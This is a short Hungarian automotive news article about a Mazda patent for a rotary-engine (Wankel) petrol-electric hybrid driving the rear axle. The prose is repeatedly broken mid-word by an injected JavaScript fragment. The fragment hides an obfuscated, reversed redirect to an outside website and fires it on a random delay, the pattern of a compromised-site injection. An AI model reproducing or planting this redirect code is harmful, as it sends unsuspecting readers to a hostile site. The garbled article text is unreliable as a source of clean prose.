A modern autóiparban a Mazda gyakorlatilag egyetlenként maradt távol eddig a hibridszcénától. Ez azonban hamarosan váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozni fog, méghozzá rendkívül stílusosan: egy szabadalmi bejegyzés arról tanúskodik, hogy a márka hagyományait felelevenítő, bolygódugattyús, avagy forgótárcsás (vagy feltalálója után Wankel-) motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor köré épülő benzin-elektromos egységet fejlesztenek. A Wankel-motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor ismételt, hatótávolság-növelő egységként való alkalmazása már felmerült a tisztán elektromos MX-30 crossoverhez. Most azonban valami egészen másról van szó – másról, mint amit valaha is láttunk. Az elöl található forgótárcsás benzinmotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor egyfelől áramfejlesztőként táplálja a hátsó tengelyt hajtó 25 kW-os villanymotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tort. Másfelől ugyanez a benzinmotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor (ami elvileg bármilyen konfigurációjú lehetne, a Wankel helytakarékossága miatt ésszerű választás) közvetlenül is képes a hátsó tengelyt hajtani –…
- Hirdetés -